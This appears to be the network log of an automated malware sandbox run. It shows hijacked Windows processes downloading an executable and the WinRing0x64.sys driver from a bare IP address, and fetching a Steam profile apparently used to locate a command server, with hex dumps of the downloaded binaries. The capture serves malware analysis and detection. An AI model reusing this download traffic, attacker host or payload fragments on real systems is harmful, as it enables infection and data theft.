                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdcd.&_}2@0L|~` F@\vl`t(@.text__``.data` _ _@.rdata0`&`@@.pdatavv@@.xdatayx@@.bss2|.idataFH|@.CRTh |@.tls0|@.rsrc\@\|@.reloclX}@B
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515585899 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515603065 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515614986 CET636INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515625954 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 35 37 74 00 31 c9 c7 00 01 00 00 00 48 8b 05 36 37 74 00 c7 00 01 00 00 00 48 8b 05 39 37 74 00 c7 00 01 00 00 00
                                                                                                                                                                                                            Data Ascii: ff.@H(H57t1H67tH97tH6tf8MZuHcP<H8PEtfH6t|tCABtBH8ttBHm8tAH=t8tP1H(B@PftEfu{
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515636921 CET1236INData Raw: 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 65 32 74 00 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 e8 97 c0 42 00 48 83 f8 01 19 c0 48 83 c4 28 c3 90 90 90 90 90 90 90 90 90 90 90 90 48
                                                                                                                                                                                                            Data Ascii: H(H(He2tH(H(BHH(H@AUATUWVSH(AIyL$H$AAHLAILALkLcCFCFCIEHCH$HC =l%1
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515647888 CET1236INData Raw: 0f 49 c2 c1 f8 05 01 81 a8 00 00 00 41 83 e1 1f 74 74 4c 8b 59 10 4d 85 db 74 6b 89 d0 48 8b 79 08 31 db c1 f8 1f c1 e8 1b 4e 8d 14 9f 01 c2 83 e2 1f 29 d0 48 89 fa 8d 68 20 0f 1f 00 8b 02 41 89 d8 89 e9 48 83 c2 04 89 c3 d3 eb 44 89 c9 d3 e0 44
                                                                                                                                                                                                            Data Ascii: IAttLYMtkHy1N)Hh AHDDBI9ut&ISH;VvHCL^H~ISHVBH([^_]ff.ATVSH0HILMtHtyL)H\$(Hw7HHu&A$H\$(HH^H0[^A\fD
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515671015 CET1236INData Raw: e8 04 41 83 e1 30 41 c1 e8 0b 41 c1 e3 06 83 e0 0c c0 ea 06 41 83 f8 1b 0f 85 ab fe ff ff 0f b6 d2 45 0f b6 c9 0f b6 c0 44 09 da 44 09 ca 09 d0 34 aa d3 f8 85 c0 0f 85 3a 03 00 00 49 8d 52 01 48 3b 56 18 0f 86 97 00 00 00 48 89 f1 e8 c7 df 43 00
                                                                                                                                                                                                            Data Ascii: A0AAAEDD4:IRH;VHCHNLQHFLVfHI9Hl$HLH)IRH;VHCHFHNHPHAHD$@@LMu;HHV1fHh[^_]A\A]A^A_fDLInDL
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515737057 CET1236INData Raw: 44 29 c9 45 85 d2 44 0f 48 d1 41 83 fa 63 7e 13 48 83 c2 03 41 81 fa e7 03 00 00 48 0f 4f c2 48 83 c0 01 48 83 c0 02 8b 0e 40 80 ff 01 0f b6 56 0c 48 83 d8 ff 4d 8b 7c 24 08 48 89 cb 48 29 c3 48 39 c8 b9 00 00 00 00 48 0f 43 d9 83 e2 0f 4c 01 f8
                                                                                                                                                                                                            Data Ascii: D)EDHAc~HAHOHH@VHM|$HH)H9HCLE1HI4tHVHHHLH(:[I$IHLwDH@t@H#_HAHT$0ELD$ H)Ll$ H|$(CHIHvDLHH[^_]A\A]A^A_
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515748978 CET1060INData Raw: 88 05 00 00 48 8d 35 a6 90 74 00 66 48 0f 6e c6 49 8b 00 4d 8b 40 08 49 89 cc 48 8d bc 24 60 01 00 00 48 8b 0a 48 8b 52 08 66 48 0f 6e d7 66 0f 6c c2 48 83 fa 02 75 0b 66 81 39 7b 7d 0f 84 e6 00 00 00 0f 11 84 24 40 01 00 00 4c 8d 94 24 40 01 00
                                                                                                                                                                                                            Data Ascii: H5tfHnIM@IH$`HHRfHnflHuf9{}$@L$@E1oc`H$LH$H$L$L$H$$PCL$HH$PIL$I$LHtMH$`HwsHAEAD$I\$
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.520448923 CET1236INData Raw: 24 10 41 c6 44 24 10 00 4c 89 e1 f3 0f 10 8c 24 00 01 00 00 49 89 1c 24 49 c7 44 24 08 00 00 00 00 e8 57 a3 44 00 e9 be fc ff ff 66 90 8b 94 24 00 01 00 00 85 d2 0f 88 16 08 00 00 89 d0 48 8d 0d 68 ff 74 00 4c 8d 94 24 60 03 00 00 83 c8 01 0f bd
                                                                                                                                                                                                            Data Ascii: $AD$L$I$ID$WDf$HhtL$`HDAH,_LB;MHILcv;Lk_AHHiQH%kdA)GYfDAA'w0QID$LLI$$H`I\$E1


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.1049996147.45.47.81806704C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.667352915 CET77OUTGET /WinRing0x64.sys HTTP/1.1
                                                                                                                                                                                                            Host: 147.45.47.81
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526747942 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:17 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 14544
                                                                                                                                                                                                            Last-Modified: Fri, 17 May 2024 16:26:03 GMT
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "6647851b-38d0"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$5:nq[q[q[q[}[V{t[V}p[Vmr[Vqp[V|p[Vxp[Richq[PEd&H"PpdP<`@`p p.text h.rdata| @H.data0@.pdata`@@HINIT"P .rsrc`@B
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526762962 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8b c4 53 48 83 ec 60 48 83 60 18 00 48 8b d9 48 8d 15 41 06
                                                                                                                                                                                                            Data Ascii: HSH`H`HHAHHL$LD$@L\$0A@3HD$(D$ y c% HdHHCpHHHHL$PHCh}HT$@HL$PyH$
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526772976 CET1236INData Raw: 48 8b 51 04 48 c1 ea 20 8b 09 8b 40 04 0f 30 48 8b 44 24 28 83 20 00 33 c0 eb 0d 48 8b 44 24 28 83 20 00 b8 01 00 00 c0 c3 cc cc cc cc cc cc cc cc 8b 09 0f 33 48 c1 e2 20 48 0b c2 49 89 00 48 8b 44 24 28 c7 00 08 00 00 00 33 c0 eb 0d 48 8b 44 24
                                                                                                                                                                                                            Data Ascii: HQH @0HD$( 3HD$( 3H HIHD$(3HD$( HHXHhHpHx ATH AIHAA;HH|wHDH=hE3HOE2t*ttA&OHHOH
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526783943 CET636INData Raw: 70 01 08 02 00 08 b2 04 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: p0
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526793957 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 00 00 cf 10 00 00 74 21 00 00 d8 10 00 00 1e 14 00 00 60 21 00 00 24 14 00 00 5f 14 00 00 40 21 00 00 68 14 00 00 93 14 00 00 24 21 00 00 9c 14 00 00 c8 14 00 00 08 21 00 00 d0 14 00 00 fb
                                                                                                                                                                                                            Data Ascii: t!`!$_@!h$!! H!(O
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526803970 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526815891 CET424INData Raw: 00 24 00 04 00 00 00 54 00 72 00 61 00 6e 00 73 00 6c 00 61 00 74 00 69 00 6f 00 6e 00 00 00 00 00 11 04 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: $Translation0*H010+0h+7Z0X03+70% <<<Obsolete>>>0!0+&h!
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526824951 CET1236INData Raw: 38 30 39 32 34 31 30 35 30 35 35 5a 30 53 31 0b 30 09 06 03 55 04 06 13 02 4a 50 31 1a 30 18 06 03 55 04 03 13 11 4e 6f 72 69 79 75 6b 69 20 4d 49 59 41 5a 41 4b 49 31 28 30 26 06 09 2a 86 48 86 f7 0d 01 09 01 16 19 68 69 79 6f 68 69 79 6f 40 63
                                                                                                                                                                                                            Data Ascii: 80924105055Z0S10UJP10UNoriyuki MIYAZAKI1(0&*Hhiyohiyo@crystalmark.info0"0*H0e<Bhhpas6~\`yed,\Sz-TKLMU{I/""!n!k?)RA#[\z
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526837111 CET1236INData Raw: ea 5f b2 ed 04 c1 d7 01 7c 21 f8 c4 71 23 fc 6b 4c 65 44 33 c3 8d 1d e6 d2 66 1c 52 29 46 c4 06 e7 0b 35 f0 59 01 66 00 89 cf 9c e3 7b 78 aa 53 e2 ee ac 35 95 e7 fd 5d d7 42 94 95 d3 1a 6e 31 55 47 d7 eb ad c7 4c 9f 54 71 83 1a 17 c8 f9 e7 ce 58
                                                                                                                                                                                                            Data Ascii: _|!q#kLeD3fR)F5Yf{xS5]Bn1UGLTqX6?Ye|@\s 4Ih@i:cG9kA~K!00U0U00UVqcQHRI03U,0*0(&$"http://crl.globalsig
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526846886 CET1236INData Raw: 28 a0 26 a0 24 86 22 68 74 74 70 3a 2f 2f 63 72 6c 2e 67 6c 6f 62 61 6c 73 69 67 6e 2e 6e 65 74 2f 52 6f 6f 74 2e 63 72 6c 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 0d 06 09 2a 86 48 86
                                                                                                                                                                                                            Data Ascii: (&$"http://crl.globalsign.net/Root.crl0U#0`{fEP/}4K0*HB.vBq@MFM[&t?{|9C`6B[]Dq"AceJ0?lRm$R'm=I2iBPmRevg)/{,QO
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.531915903 CET1236INData Raw: c6 6f c3 d7 ea 12 41 1d 0c 39 5e f6 96 f8 c3 cd 9e 1f ff 51 88 69 76 98 8b 8e b4 27 88 82 1a d6 3c 7a ab b0 4e b7 3e e8 d4 34 d2 c1 a4 39 53 3c b2 74 7b 15 37 30 54 a6 eb b9 24 cc 2f 08 4b 43 64 f1 4a af 8d 9c e8 54 6c b2 db dc 3b b1 c7 22 84 9f
                                                                                                                                                                                                            Data Ascii: oA9^Qiv'<zN>49S<t{70T$/KCdJTl;"UrsEV6lqvr9n9S*;QsT-w>6B%0 0a$H0*H010UBE10UGlobalSign nv-sa1%


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.1049794104.102.49.2544437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:28 GMT
                                                                                                                                                                                                            Content-Length: 35964
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=9ae989a2dd6201658d87e3cd; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC16384INData Raw: 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e
                                                                                                                                                                                                            Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submen
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC3768INData Raw: 70 6c 61 79 65 72 41 76 61 74 61 72 20 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 69 7a 65 20 6f 66 66 6c 69 6e 65 22 20 64 61 74 61 2d 6d 69 6e 69 70 72 6f 66 69 6c 65 3d 22 31 37 36 34 30 36 36 31 37 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d
                                                                                                                                                                                                            Data Ascii: playerAvatar profile_header_size offline" data-miniprofile="1764066172"><div class="playerAvatarAutoSizeInner"><img src="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div>
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC1345INData Raw: 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0d 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e
                                                                                                                                                                                                            Data Ascii: teamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">&copy; Valve Corporation. All rights reserved. All trademarks are property of their respective own


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.1049793104.102.49.2544437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:28 GMT
                                                                                                                                                                                                            Content-Length: 35964
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: sessionid=6da4f42fa7a2bff6fa12abb8; Path=/; Secure; SameSite=None
                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                            2024-11-14 11:19:28 UTC16384INData Raw: 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e
                                                                                                                                                                                                            Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submen
